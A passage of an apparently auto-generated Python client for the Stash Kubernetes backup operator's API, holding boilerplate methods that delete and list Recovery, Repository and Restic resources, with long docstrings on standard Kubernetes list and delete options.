:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stash_appscode_com_v1alpha1_collection_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_collection_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, body, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
delete a Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.delete_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def delete_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
delete a Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'grace_period_seconds' in params:
query_params.append(('gracePeriodSeconds', params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in params:
query_params.append(('orphanDependents', params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in params:
query_params.append(('propagationPolicy', params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, body, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
delete a Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.delete_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def delete_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
delete a Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'grace_period_seconds' in params:
query_params.append(('gracePeriodSeconds', params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in params:
query_params.append(('orphanDependents', params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in params:
query_params.append(('propagationPolicy', params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, body, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
delete a Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.delete_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def delete_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
delete a Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'grace_period_seconds' in params:
query_params.append(('gracePeriodSeconds', params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in params:
query_params.append(('orphanDependents', params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in params:
query_params.append(('propagationPolicy', params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_stash_appscode_com_v1alpha1_api_resources(self, **kwargs): # noqa: E501
"""get_stash_appscode_com_v1alpha1_api_resources # noqa: E501
get available resources # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_stash_appscode_com_v1alpha1_api_resources(async=True)
>>> result = thread.get()
:param async bool
:return: IoK8sApimachineryPkgApisMetaV1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_stash_appscode_com_v1alpha1_api_resources_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_stash_appscode_com_v1alpha1_api_resources_with_http_info(**kwargs) # noqa: E501
return data
def get_stash_appscode_com_v1alpha1_api_resources_with_http_info(self, **kwargs): # noqa: E501
"""get_stash_appscode_com_v1alpha1_api_resources # noqa: E501
get available resources # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_stash_appscode_com_v1alpha1_api_resources_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: IoK8sApimachineryPkgApisMetaV1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_stash_appscode_com_v1alpha1_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1APIResourceList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_stash_appscode_com_v1alpha1_namespaced_recovery(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
list or watch objects of kind Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_recovery(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RecoveryList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.list_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, **kwargs) # noqa: E501
return data
def list_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
list or watch objects of kind Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RecoveryList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
